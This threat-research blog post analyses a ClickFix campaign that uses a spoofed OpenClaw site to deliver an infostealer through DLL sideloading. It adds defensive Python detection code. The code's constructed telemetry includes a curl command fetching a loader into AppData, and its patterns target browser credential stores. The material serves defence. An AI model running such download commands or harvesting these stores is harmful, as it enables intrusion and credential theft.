Fake OpenClaw AI Tool Used to Deliver Infostealer via ClickFix Attack Chain
Gurucul Threat Research blog, April 8, 2026
Overview
This report analyzes a malware distribution campaign leveraging a spoofed OpenClaw platform to deliver an infostealer payload. The campaign relies on ClickFix-style social engineering to trick users into executing malicious commands manually, bypassing browser-based security controls.
Once executed, the payload initiates a staged infection chain involving a loader, a masqueraded executable, and a malicious DLL deployed via sideloading. The final payload focuses on browser credential harvesting and data exfiltration over HTTPS using WinHTTP APIs, enabling stealthy communication with attacker-controlled infrastructure.
Initial Access: ClickFix-Based Social Engineering
The campaign uses a typosquatted domain designed to impersonate the legitimate OpenClaw platform. The website closely mimics the original branding and user interface to establish trust.
ClickFix is a social engineering technique in which the victim is told to copy a command and run it themselves (here, in Command Prompt), usually under a pretext such as fixing an error or completing a verification step. Because the download and execution happen outside the browser, browser download scanning and reputation checks are never applied to the payload.
Figure 1: Spoofed OpenClaw website (app-clawbot[.]org) impersonating the legitimate platform to lure users into initiating the infection chain.
Instead of providing a standard installer, the site redirects users to a ClickFix-style interface that instructs them to manually execute a command via Command Prompt.
Figure 2: ClickFix-style instructions prompting users to manually execute a malicious command, bypassing browser-based security controls.
Execution Chain
The infection chain is initiated when the user executes the provided command via Command Prompt.
Execution occurs in the context of the logged-in user, with no evidence of privilege escalation observed during initial stages.
The command performs the following actions:
Downloads a payload using curl
Writes the file into %AppData%
Executes the payload immediately
User → ClickFix → cmd.exe → curl → Loader → AvastSvc.exe → aswCmnOS.dll → Browser Data → C2
Following execution, the malware proceeds through a staged deployment:
Initial binary executes as a loader
Loader drops:
AvastSvc.exe (masqueraded executable)
Multiple DLLs, including aswCmnOS.dll
The executable triggers DLL sideloading
The malicious DLL is loaded and executed
Execution Analysis: Process Tree
Figure 4: Process tree revealing the malware execution flow: staged execution, including loader activity and the subsequent launch of a masqueraded executable.
As shown above, the process tree highlights the transition from initial execution to payload activation, confirming a multi-stage infection model.
The absence of a legitimate parent application chain and execution from user-writable directories further reinforces that the observed activity is malicious and not part of standard software installation behavior.
Defense Evasion: DLL Sideloading and Masquerading
The malware abuses DLL sideloading by bundling a legitimate-looking executable with a malicious DLL in the same directory.
Figure 5: Dropped files demonstrating DLL sideloading, where a legitimate-looking executable loads a malicious DLL from the same directory.
Windows resolves a DLL that is imported by name (without a path) by searching the directory the executable was started from before the system directories, for any DLL that is not on the KnownDLLs list. As a result:
The executable loads the malicious DLL from its own directory instead of the legitimate library
Execution occurs under the context of a trusted-looking binary
Additionally, the filename AvastSvc.exe mimics legitimate security software, further reducing suspicion. Checking the signature of the executable alone is therefore not sufficient; the DLLs it loads from the same directory must be verified as well.
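The search-order behavior above, and a hunt for the staged file layout it enables, as an added example (not Gurucul's code). The file listing, the KnownDLLs subset and the assumed Avast install directory are constructed for illustration; the loader name and paths are not taken from the report.

```python
"""Added example (not Gurucul's code): model the Windows DLL search order for a
DLL requested by name, and hunt a file listing for executable/DLL pairs staged
the way the report describes. All paths and the file listing are constructed."""
from pathlib import PureWindowsPath

SYSTEM32 = r"C:\Windows\System32"
WINDIR = r"C:\Windows"
# Constructed subset of KnownDLLs (HKLM\SYSTEM\CurrentControlSet\Control\
# Session Manager\KnownDLLs). The loader maps these from System32 no matter
# what sits beside the executable, so they cannot be sideloaded this way.
KNOWN_DLLS = {"ntdll.dll", "kernel32.dll", "kernelbase.dll", "user32.dll", "advapi32.dll"}
# Directories a standard user can write to; anything executing from here
# with DLLs beside it is suspect.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\")
# Assumed install directory for the genuine Avast service binary (assumption,
# used only to make the "outside expected path" check concrete).
EXPECTED_HOME = {"avastsvc.exe": r"c:\program files\avast software\avast"}


def _norm(path):
    return str(PureWindowsPath(path)).lower()


def resolve_dll(dll_name, app_dir, present, cwd=None, path_dirs=(), safe_search=True):
    """Return the path the loader would pick for dll_name when the import names
    the DLL without a path. `present` is the set of files that exist.
    Search order (SafeDllSearchMode on, the default): application directory,
    System32, Windows directory, current directory, PATH. With SafeDllSearchMode
    off the current directory moves up to second place. Either way the
    application directory is searched first, which is what sideloading abuses."""
    present = {_norm(p) for p in present}
    if dll_name.lower() in KNOWN_DLLS:
        return str(PureWindowsPath(SYSTEM32) / dll_name)
    order = [app_dir]
    if cwd and not safe_search:
        order.append(cwd)
    order += [SYSTEM32, WINDIR]
    if cwd and safe_search:
        order.append(cwd)
    order += list(path_dirs)
    for directory in order:
        candidate = PureWindowsPath(directory) / dll_name
        if _norm(candidate) in present:
            return str(candidate)
    return None


def sideload_findings(files):
    """Group a file listing by directory and report executables that sit in a
    user-writable directory with DLLs beside them, or that carry a security-
    product name outside the product's expected install directory."""
    by_dir = {}
    for f in files:
        p = PureWindowsPath(f)
        by_dir.setdefault(_norm(p.parent), (str(p.parent), []))[1].append(p.name)
    findings = []
    for key, (display_dir, names) in by_dir.items():
        dlls = sorted(n for n in names if n.lower().endswith(".dll"))
        for exe in (n for n in names if n.lower().endswith(".exe")):
            reasons = []
            if dlls and any(m in key + "\\" for m in USER_WRITABLE_MARKERS):
                reasons.append("executable with co-located DLLs in a user-writable directory")
            home = EXPECTED_HOME.get(exe.lower())
            if home and key != home:
                reasons.append("security-product file name outside its expected install path")
            if reasons:
                findings.append({"exe": str(PureWindowsPath(display_dir) / exe),
                                 "dlls": dlls, "reasons": reasons})
    return findings


# Constructed listing modelled on the report's dropped-file figure (Figure 5).
STAGED_FILES = [
    r"C:\Users\victim\AppData\Roaming\AvastSvc.exe",
    r"C:\Users\victim\AppData\Roaming\aswCmnOS.dll",
    r"C:\Users\victim\AppData\Roaming\kernel32.dll",        # decoy: never loaded, it is a KnownDLL
    r"C:\Windows\System32\kernel32.dll",
    r"C:\Program Files\Avast Software\Avast\AvastSvc.exe",  # assumed legitimate copy, no DLLs beside it
]

if __name__ == "__main__":
    app_dir = r"C:\Users\victim\AppData\Roaming"
    print(resolve_dll("aswCmnOS.dll", app_dir, STAGED_FILES))   # the co-located DLL wins
    print(resolve_dll("kernel32.dll", app_dir, STAGED_FILES))   # System32 copy despite the decoy
    for finding in sideload_findings(STAGED_FILES):
        print(finding)
```

The `resolve_dll` model omits the 16-bit System directory and treats `present` as the whole file system; the point it makes is that both search modes consult the application directory first, so a DLL name that is neither a KnownDLL nor loaded by full path is resolvable from wherever the executable was dropped. `sideload_findings` is the hunt side: run it over a directory listing (or an EDR file inventory) and it flags the AppData pair while leaving the legitimate install alone.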
System Profiling
Before executing its primary functionality, the malware performs basic host identification.
It queries the following registry key:
HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName\ComputerName
Figure 6: Registry query used for system identification, retrieving the host computer name.
This behavior supports:
Victim identification
Campaign tracking
Environment awareness
No advanced sandbox evasion techniques were observed in the analyzed sample.
Payload Execution: Malicious DLL (aswCmnOS.dll)
The file aswCmnOS.dll acts as the primary payload and is loaded via DLL sideloading.
The DLL serves as the primary execution component, orchestrating credential harvesting and command-and-control communication:
Initializing runtime components
Loading or decrypting configuration data
Executing credential harvesting routines
Initiating communication with the command-and-control server
This modular architecture enhances evasion by separating execution stages and reducing observable indicators per component.
Static analysis of aswCmnOS.dll indicates that execution is initiated through standard DLL entry mechanisms, followed by initialization routines responsible for loading embedded configuration data. Observed API usage and string references suggest a staged execution model, where browser targeting and network communication components are initialized sequentially.
Targeted Data Collection: Browser Credential Theft
The malware includes logic to selectively target browser processes, ensuring focused data collection.
Figure 7: Decompiled function used to identify browser processes, enabling selective credential harvesting.
Based on this logic, the malware targets:
Chromium-based browsers (Chrome, Edge)
Mozilla Firefox
Data of interest includes:
Stored credentials (Login Data databases)
Cookies and session tokens
Browser profile data
Selective execution minimizes noise and increases efficiency in credential harvesting.
Data extraction likely targets the browsers' on-disk stores. For Chromium-based browsers these are SQLite databases in the profile directory under the user's local AppData (Login Data for saved credentials, Network\Cookies for cookies), with secrets encrypted per user via DPAPI, which a process running as the logged-in user can unwrap; newer Chrome releases add app-bound encryption on top, which raises the bar for a user-level stealer. Firefox keeps logins in logins.json with the decryption key in key4.db, and cookies in cookies.sqlite.
Command and Control (C2) Communication
The malware communicates with attacker-controlled infrastructure using WinHTTP APIs.
Figure 8: Use of WinHTTP APIs for HTTPS-based communication with command-and-control infrastructure.
Observed APIs include:
WinHttpConnect
WinHttpOpenRequest
WinHttpSendRequest
These are used for:
Exfiltration of collected data
Beaconing to maintain connectivity
Potential tasking
HTTPS on port 443 encrypts the request contents, so without TLS interception network monitoring sees only the destination, the TLS handshake and traffic volume, not the exfiltrated data itself.
Using the built-in WinHTTP stack rather than a bundled networking library lets the traffic blend with ordinary Windows system traffic and removes the anomalous-library indicators some security tools look for. The destination domain, and the fact that an unsigned executable in a user directory is making outbound HTTPS connections, remain observable.
MITRE ATT&CK Mapping
The campaign aligns with the following techniques:
T1204 – User Execution
T1036 – Masquerading
T1574.002 – Hijack Execution Flow: DLL Side-Loading
T1005 – Data from Local System
T1071.001 – Application Layer Protocol: Web Protocols
Mappings are limited to confirmed behaviors to maintain analytical accuracy.
Detection Opportunities
Process Behavior
Process chain: cmd.exe spawning curl.exe with an output path under %AppData%, followed by the same cmd.exe launching %AppData%\*.exe (curl only downloads the file; the execution step is a second child of the shell)
Suspicious parent-child relationships resulting from user-initiated command execution, including an executable in %AppData% launching another executable from the same directory
File System Indicators
Executables and DLLs located in user directories
Presence of:
AvastSvc.exe, or other executables mimicking security software, outside the product's standard installation directory
Co-located DLLs used for sideloading
Defense Evasion Indicators
Unsigned DLLs loaded by legitimate-looking executables
Execution from non-standard directories
Registry Activity
Queries to system identification keys such as ComputerName
Network Indicators
Outbound HTTPS connections made through WinHTTP by executables in user-writable directories rather than by a browser or a signed application
Connections to newly registered or low-reputation domains
Behavioral Indicators
Access to browser credential stores
Cookie and session token extraction
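The detection opportunities above, expressed as rules over endpoint telemetry, as an added example (not Gurucul's code). The events are constructed Sysmon/EDR-style records modelled on the report's process tree and figures; the loader file name, process IDs, host paths and the download host are placeholders, not indicators from the report.

```python
"""Added example (not Gurucul's code): the report's detection opportunities as
rules over constructed endpoint telemetry. Event shapes follow Sysmon/EDR
conventions but are simplified; none of these records are real logs."""
import re

# Paths a standard user can write to; executables running from here get no
# trust from their location.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(appdata|downloads)\\|\\temp\\", re.I)
# Chromium (Login Data, Web Data, Network\Cookies) and Firefox (logins.json,
# key4.db, cookies.sqlite) credential and cookie stores.
BROWSER_STORES = re.compile(
    r"\\(login data|web data|network\\cookies|logins\.json|key4\.db|cookies\.sqlite)$", re.I)
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
COMPUTERNAME_KEY = r"hklm\system\currentcontrolset\control\computername\activecomputername"


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def dirname(path):
    return path.rsplit("\\", 1)[0].lower()


def in_user_dir(path):
    return bool(USER_WRITABLE.search(path))


def run_rules(events):
    """Return (rule, detail) findings. Events are dicts with a 'type' of
    process, imageload, registry, file or network; processes must appear in
    creation order so the cmd.exe -> curl.exe -> %AppData% chain can be linked
    through the shared parent pid."""
    findings = []
    cmd_pids_that_ran_curl = set()
    for e in events:
        kind = e["type"]
        if kind == "process":
            img, parent = basename(e["image"]), basename(e.get("parent_image", ""))
            if img == "curl.exe" and parent == "cmd.exe" and in_user_dir(e.get("cmdline", "")):
                cmd_pids_that_ran_curl.add(e["parent_pid"])          # download into AppData
            elif parent == "cmd.exe" and in_user_dir(e["image"]) and e["parent_pid"] in cmd_pids_that_ran_curl:
                findings.append(("clickfix_chain", e["image"]))      # same cmd.exe runs the drop
            elif in_user_dir(e.get("parent_image", "")) and in_user_dir(e["image"]):
                findings.append(("staged_launch", e["image"]))       # loader -> masqueraded exe
        elif kind == "imageload":
            if (in_user_dir(e["image"]) and dirname(e["image"]) == dirname(e["loaded"])
                    and not e.get("signed", False)):
                findings.append(("sideload_unsigned_dll", e["loaded"]))
        elif kind == "registry":
            if e["key"].lower().startswith(COMPUTERNAME_KEY) and in_user_dir(e["image"]):
                findings.append(("host_profiling", e["image"]))
        elif kind == "file":
            if BROWSER_STORES.search(e["target"]) and basename(e["image"]) not in BROWSERS:
                findings.append(("browser_store_access", e["target"]))
        elif kind == "network":
            if in_user_dir(e["image"]) and e["dest_port"] == 443:
                findings.append(("user_dir_exe_https", f'{e["image"]} -> {e["dest"]}:443'))
    return findings


# Constructed telemetry, not real logs. "loader.exe", the pids and the download
# host are placeholders; only the AvastSvc.exe / aswCmnOS.dll names come from the report.
APP = r"C:\Users\victim\AppData\Roaming"
CMD = r"C:\Windows\System32\cmd.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
LOGIN_DATA = r"C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Login Data"
EVENTS = [
    {"type": "process", "pid": 4120, "image": r"C:\Windows\System32\curl.exe", "parent_pid": 4100,
     "parent_image": CMD, "cmdline": f"curl -o {APP}\\loader.exe https://example.invalid/get"},
    {"type": "process", "pid": 4130, "image": f"{APP}\\loader.exe", "parent_pid": 4100, "parent_image": CMD},
    {"type": "process", "pid": 4140, "image": f"{APP}\\AvastSvc.exe", "parent_pid": 4130,
     "parent_image": f"{APP}\\loader.exe"},
    {"type": "imageload", "image": f"{APP}\\AvastSvc.exe", "loaded": f"{APP}\\aswCmnOS.dll", "signed": False},
    {"type": "registry", "image": f"{APP}\\AvastSvc.exe",
     "key": r"HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName\ComputerName"},
    {"type": "file", "image": f"{APP}\\AvastSvc.exe", "target": LOGIN_DATA},
    {"type": "file", "image": CHROME, "target": LOGIN_DATA},                       # benign: the browser itself
    {"type": "network", "image": f"{APP}\\AvastSvc.exe", "dest": "example.invalid", "dest_port": 443},
    {"type": "network", "image": CHROME, "dest": "example.invalid", "dest_port": 443},  # benign
]

if __name__ == "__main__":
    for rule, detail in run_rules(EVENTS):
        print(f"{rule:24} {detail}")
```

Mapping to real sources: the process, imageload and network records correspond to Sysmon Event IDs 1, 7 (which carries the Signed field) and 3. Sysmon does not log registry reads or file reads, so the registry and file rules need EDR telemetry or Windows object-access auditing (event 4663 with a SACL on the browser profile directory). The clickfix rule deliberately requires both halves of the chain from the same cmd.exe; either half alone is common enough in developer and admin activity that it should only raise the score, not fire on its own.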
Indicators of Compromise (IOCs)
Domain
app-clawbot[.]org
File Names
AvastSvc.exe
aswCmnOS.dll
File Path
%AppData%\
Conclusion
This campaign demonstrates a structured and effective infection chain combining social engineering and execution evasion techniques.
Key characteristics include:
User-driven execution via ClickFix
Staged payload deployment
DLL sideloading for stealth
Targeted browser credential harvesting
Encrypted C2 communication using native Windows APIs
The reliance on legitimate tools and user interaction reduces detection by traditional security controls, which is what makes user-driven execution techniques such as ClickFix effective, and it emphasizes the need for behavioral monitoring and endpoint visibility.
Contributors:
Siva Prasad Boddu
Pandurang Terkar
Rudra Pratap